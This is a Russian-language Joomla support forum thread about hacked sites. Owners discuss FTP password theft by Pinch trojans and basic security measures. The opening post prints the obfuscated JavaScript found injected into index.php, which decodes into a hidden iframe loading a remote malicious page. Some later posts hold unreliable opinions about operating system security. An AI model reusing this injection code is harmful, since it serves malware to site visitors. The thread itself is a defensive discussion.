0 Пользователей и 1 Гость просматривают эту тему.
  • 25 Ответов
  • 7380 Просмотров
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
сегодня поломали сайт новым вирусом.
дописывает в конец index.php
вот такую строчку в <script> вредоносный код ниже, сам вредоносен и качает файлы pdf зараженные. </script>:

Цитировать
var source ="=jgsbnf!tsd>#iuuq;00svtsn/dpn0dpvoufs0hp/qiq@tje>2#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

стоит joomla 1.0.12
доп компоненты: AdsManager 2.1.19, linx 1.хз
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Уважаемый, ну почитали бы вы форум и сразу бы нашли ответ. Ничего нового в данном случае нет и не было. Как воровали трояны у беспечных пользователей пароли к FTP так и воруют. И до тех пор, пока пользователи не начнут серьезно относиться к вопросам безопасности - данная ситуация будет повторяться с завидной регулярностью.
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
пароль от фтп хранится у меня в архиве rar под большим паролем
да и сам пароль не маленький.
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
И из архива в FTP-клиент он попадает сам по себе, минуя буфер обмена? Тогда можно предположить только одно - волшебство.
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
ну почему же, как будь то больше нет возможности взломать сайт кроме как своровать пароль от фтп
дак и у меня на аккаунте том не один сайт а 4
а взломали только 2 из них, причем код вирусы в сайты дописали разный
« Последнее редактирование: 11.02.2009, 10:40:07 от duddy »
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
ответ от саппорта:
Механизм заражения сайта следующий. Индексные страницы менялись посредством FTP ЛЕГАЛЬНОГО подключения, т.е. никакого взлома сайта не производилось, а всего лишь осуществлялся вход по логину/паролю и последующая модификация файлов сайта. После более детального изучения выяснилось, что подобное поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы и похищает все к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP, Total Commander и еще десятке различных программ.

Само заражение происходит следующим образом:
- Сначала загружается Trojan-Downloader.VBS. Psyme.fc или иной - троянская программа-загрузчик других троянов, в последнее время название несколько раз изменялось.
- Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Вам необходимо:
1. Полная проверка своего компьютера на вирусы, spyware, трояны и прочее вредоносное ПО антивирусом с последними обновлениями, для верности желательно использовать антивирусное ПО нескольких производителей с максимальным уровнем эвристики. Также необходимо проверить на наличие вирусов все компьютеры, имеющие доступ к Вашему FTP.
2. Смена паролей доступа к всем ftp аккаунтам и контрольной панели.
3. Регулярно проверять индексные файлы на предмет появления записей подобного типа. В случае обнаружения удалять вирусную строку.
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
вот эта строка просто убивает:
поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы и похищает все к чему может дотянуться
похоже это случилось со мной и может случится с вами, и даже каждодневное обновление касперского не помогает.
антивирусы как решето для них...
*

b2z

  • Глобальный модератор
  • 7084
  • 768 / 0
  • Разраблю понемногу
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы
насколько я помню, Kaspersky умел ловить Trojan-PSW.Win32.PdPinch, Trojan-PSW.Win32.LdPinch и им подобные еще в 2007 году. Да и если мне опять же память не изменяет, то авторы данных троянов тоже были найдены товарищами из ФСБ. Модификаций этих зверюшек было много, но касперский их всегда успешно ловил.
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
нет это не верно...
кстати сказать я уже где то года полтора назад ловил у себя на компе Pinch который не знала ни один из извествествных антивирей(в том числе и всеми любимый каспер и нод32), послал на анализ и дествительно оказался шпиён.
так что блин всеже антивирусы пока что слабы в плане новых разновидностей троянов и других тварей.
« Последнее редактирование: 11.02.2009, 11:53:56 от duddy »
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Важно !!! взлом сайтов новым вирусом
« Ответ #10 : 11.02.2009, 11:49:55 »
Ну во-первых Nod32 никогда троянов и не ловил, и по мне это вообще не антивирус, можно сказать антивирусный файрвол, но не антивирус, он фактически ничего лечить не умеет. А во-вторых, почему-то у меня за последние 8 лет ни разу подобной проблемы не возникало... Может я волшебник? Или может потому, что я всегда придерживаюсь вполне простых правил безопасности?
*

duddy

  • Захожу иногда
  • 65
  • 0 / 0
Re: Важно !!! взлом сайтов новым вирусом
« Ответ #11 : 11.02.2009, 11:53:39 »
вы знаете у меня за последние 10  лет тоже это первый раз когда взломали таки что то, но тем не менее будьте бдительнее товарищи, до сегодняшнего дня я тоже считал себя волшебником)))

p.s. вот примеры моих переписок с лабой Касперского за последнее время:
В присланном Вами файле обнаружено новое вредоносное программное обеспечение (Trojan-Downloader.Win32.Horst.ap).
Его детектирование будет включено в очередное обновление антивирусных баз.
Благодарим за оказанную помощь.
и т.д. уже не один раз...
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Важно !!! взлом сайтов новым вирусом
« Ответ #12 : 11.02.2009, 12:54:04 »
Безусловно, вируосписатели не стоят на месте, и в отличие от разработчиков антивирусов, они чуть-чуть но впереди - они всегда могут проверить свое творение на стойкость к свежим антивирусам.

Но ведь есть куча простых мер безопасности, которые могут помочь. Например:

1. Не посещать малознакомые сайты
2. Ограничить доступ в административную панель сайта по IP
3. Ограничить доступ к FTP по IP
4. Не держать на сайте постоянно открытым FTP, а открывать только тогда, когда он реально нужен. В большинстве случаев это требуется только на этапе настройки сайта или при обновлении.
5. Не использовать IE при работе с незнакомыми сайтами (львиная доля троянов проходит именно с IE)
6. Регулярно менять пароли и на FTP и на административные пароли - даже если утянут, есть вероятность, что воспользоваться не успеют.
7. Регулярно делать резервные копии сайта, чтобы была возможность оперативно откатиться на оригинальную, не зараженную версию.
8. Регулярно обновлять базы антивирусного ПО, использовать какой-либо firewall для мониторинга подозрительной активности на компьютере.
*

Hawk-5

  • Осваиваюсь на форуме
  • 20
  • 0 / 0
Re: Важно ! взлом сайтов новым вирусом
« Ответ #13 : 21.07.2010, 14:03:18 »
Цитировать
2. Ограничить доступ в административную панель сайта по IP
3. Ограничить доступ к FTP по IP
А как это сделать? Подскажите пожалуйста.

И если можно объясните мне что такое FTP?
« Последнее редактирование: 21.07.2010, 14:40:06 от Hawk-5 »
*

crazyASD

  • Давно я тут
  • 582
  • 26 / 2
Re: Важно ! взлом сайтов новым вирусом
« Ответ #14 : 22.07.2010, 11:41:38 »
9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.
Сон разума порождает монстров
--
Фрилансом не занимаюсь. Никому ничего не должен. Отвечаю по мере знания и умения. -- JFusion - Наше всё! Joomla 1.5.23 SMF 1.1.15 JFusion 1.5.6 JComments 2.2.0 JoomGallery 1.5.6.4 JDownloads 1.8
*

tbhost

  • Захожу иногда
  • 158
  • 10 / 6
Re: Важно ! взлом сайтов новым вирусом
« Ответ #15 : 22.07.2010, 12:13:11 »
9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.
С этим пунктом отпадает пункт IE, насчет кой какого firewall в пункте 8 не совсем согласен, нужно нормально настраивать айпитаблес и открывать только нужные порты...
*

llektor

  • Захожу иногда
  • 214
  • 2 / 2
Re: Важно ! взлом сайтов новым вирусом
« Ответ #16 : 17.12.2010, 19:08:05 »

Хочу поинтересоваться,на сайте в конце в низу каждой статьи стали появляться в строчку ссылки на незнакомые мне сайты,стал смотреть оказалось что код прячеться где то в css
А узнал что в css я загрузил шаблон с сайт а комп,потом снес шаблон и по новой установил такой же только свежий,а потом по очереди каждый файл каждую папку из старого заражоного шаболна заменял,и именно после замены css папки заражонного шаблона появляются эти ссылки,я проверил все CSS фалы но нечего подозрительно не нашел,не подскажите как такое может быть что в CSS прописан код или еще что
Знаю я разгельдяй и всегда оставляю пароль в FilZilla не думал что такое может произойти с моим сайтом,подскажите пожалуйста если знаете
К стате у меня стои Nod ESET Smart Security
Вот скриншот если будет интересно,на скриншоте обвденные ссылки красным цветом вот они появляются
« Последнее редактирование: 18.12.2010, 20:33:19 от llektor »
*

Delfinov

  • Захожу иногда
  • 52
  • 0 / 0
Re: Важно ! взлом сайтов новым вирусом
« Ответ #17 : 20.12.2010, 22:58:20 »
У меня такое было, когда я поставил плагин палёный. Причем, вероятно, установщик ссылок зашифрован и находится в Ява или другой библиотеке. Кординальное решение - переустановка Joomla. Либо надо поковыряться профи. Выведи, если есть, сайт из бекапа (у провайдера) и установи все для безопасности (как вариант).
*

beliyadm

  • Легенда
  • 9512
  • 1650 / 66
  • Севастополь == Россия
Re: Важно ! взлом сайтов новым вирусом
« Ответ #18 : 20.12.2010, 23:07:04 »
Ну во-первых Nod32 никогда троянов и не ловил, и по мне это вообще не антивирус, можно сказать антивирусный файрвол, но не антивирус, он фактически ничего лечить не умеет. А во-вторых, почему-то у меня за последние 8 лет ни разу подобной проблемы не возникало... Может я волшебник? Или может потому, что я всегда придерживаюсь вполне простых правил безопасности?
ИНтересно, даже регулярно посещая всякие взрослые ресурсы (естественно бохатые на подобное добро) аналогично никогда ничего не ловил, стоит каспер (лицензия на Internet Security). Правда обычно еще сижу из под outpost домашнего (потому как дома выделенный IP), там тоже правил всяких написано
Потому храню все везде и ни за что не боюсь, элементарная безопасность и некоторое количество денег на лицензию - нет проблем
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Записки нетрезвого кодера
Skype: beliyadm_pb
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Важно ! взлом сайтов новым вирусом
« Ответ #19 : 20.12.2010, 23:23:17 »
Потому храню все везде и ни за что не боюсь
Молод ты еще и недостаточно параноидален ;) Если у вас нет паранойи, это еще не значит, что они за вами не следят (с)
*

beliyadm

  • Легенда
  • 9512
  • 1650 / 66
  • Севастополь == Россия
Re: Важно ! взлом сайтов новым вирусом
« Ответ #20 : 20.12.2010, 23:41:32 »
Молод ты еще и недостаточно параноидален
админы делятся на тех, кто уже делает бекапы и кто их еще не делает? Знаем знаем :)
Но увы, за столько лет у меня не было ни одного факта вируса на компе, тем более троянов взломов и прочего, что при моем уровне серфинга как минимум невозможно в обычных обстоятельствах.
фаер+антивирус+элементарная внимательность в сети опосля 300 грамм и нет никаких проблем
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Записки нетрезвого кодера
Skype: beliyadm_pb
*

voland

  • Легенда
  • 10918
  • 581 / 111
  • Эта строка съедает место на вашем мониторе
Re: Важно ! взлом сайтов новым вирусом
« Ответ #21 : 20.12.2010, 23:51:57 »
админы делятся на тех, кто уже делает бекапы и кто их еще не делает? Знаем знаем :)
Но увы, за столько лет у меня не было ни одного факта вируса на компе, тем более троянов взломов и прочего, что при моем уровне серфинга как минимум невозможно в обычных обстоятельствах.
фаер+антивирус+элементарная внимательность в сети опосля 300 грамм и нет никаких проблем
Не каркай... у меня на домашнем винда года за 3 также ни одного вируса не подхватила, но паранойя и доступ к далеко не дешевым клиентским сайтам (ну и плюс еще разное) увели меня на linux.

PS Если начнется атака на конкретного человека, тут на винде ничего не спасет
*

llektor

  • Захожу иногда
  • 214
  • 2 / 2
Re: Важно ! взлом сайтов новым вирусом
« Ответ #22 : 20.12.2010, 23:53:55 »
У меня такое было, когда я поставил плагин палёный. Причем, вероятно, установщик ссылок зашифрован и находится в Ява или другой библиотеке

Мне кажется что плагин тут не причем,и при том что кроме шаблона я не каких плагинов или расширений больше не ставил,чистая Joomla стоит,но как только я удалил и переустановил такой же шаблон то ссылки исчезли,в этом шаблоне есть несколько JS файлов может в них код прописан но такие файлы я проверять немогу,возможно что утащили пароль и установили код,еще раз повтарюсь при замене шаблоны ссылки исчезли
Естесвено я данные фтп и хостинга поменял,я везде поменял где можно,но все равно интересно как поал туда код
« Последнее редактирование: 20.12.2010, 23:57:56 от llektor »
*

beliyadm

  • Легенда
  • 9512
  • 1650 / 66
  • Севастополь == Россия
Re: Важно ! взлом сайтов новым вирусом
« Ответ #23 : 21.12.2010, 00:05:41 »
PS Если начнется атака на конкретного человека, тут на винде ничего не спасет
тут уж никакая система не спасет, пробьют любым путем, так что никсы не панацея
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Записки нетрезвого кодера
Skype: beliyadm_pb
*

voland

  • Легенда
  • 10918
  • 581 / 111
  • Эта строка съедает место на вашем мониторе
Re: Важно ! взлом сайтов новым вирусом
« Ответ #24 : 21.12.2010, 00:08:37 »
тут уж никакая система не спасет, пробьют любым путем, так что никсы не панацея
Не панацея естественно, но ЗАМЕТНО усложнят поиск дыр, особенно если учесть как небыстро MS правит свои дырки и их способ установки (ну вот работаю я сейчас под никсами дней 20 без рестарта, ежедневно обновляясь) с рестартом (взять многие серверы - там рестарт тупо недопустим слишком часто)
*

NeZ

  • Захожу иногда
  • 290
  • 22 / 4
  • Большой программе - большие глюки
Re: Важно ! взлом сайтов новым вирусом
« Ответ #25 : 01.01.2011, 13:08:12 »
9. Отказаться от использования Windows и перейти на Linux или Mac OS. Этот пункт наиболее эффективен.
Возможно, но все же люнукс на столько дырявая система, что ломануть ее как 5 пальцев об асфальт. А считают ее безопасной только потому, что вирусописателям она на фиг не нужен, ибо львиная доля пользователей сидят на винде.
поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы
Даже не смотря что создателей дятьки поймали, пинч развивается с каждым днем. В данном случае даже сейчас он идет дальше чем каспер шага на 2.
ЗЫ: Сам его пробывал, ни один догдашний антивир его не обнаружил. АйЕ он пробивает за 1 секунду, тащет все.... даже с мыла когда приходит, его скачивать не надо. Вот так.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 54596
Последний ответ 13.09.2019, 18:49:33
от diana1975
Генерируются материалы (взлом?)

Автор vanchou

Ответов: 3
Просмотров: 471
Последний ответ 05.04.2018, 17:33:37
от wishlight
Взлом сайта через шаблон

Автор Mr-fan

Ответов: 11
Просмотров: 1861
Последний ответ 13.12.2017, 16:06:49
от SeBun
Взлом Joomla 3

Автор tiberian

Ответов: 1
Просмотров: 786
Последний ответ 31.03.2017, 16:16:50
от SeBun
Взлом или Joomla должна штатно такое делать?

Автор alpeichik

Ответов: 19
Просмотров: 1452
Последний ответ 04.02.2017, 19:48:38
от flyingspook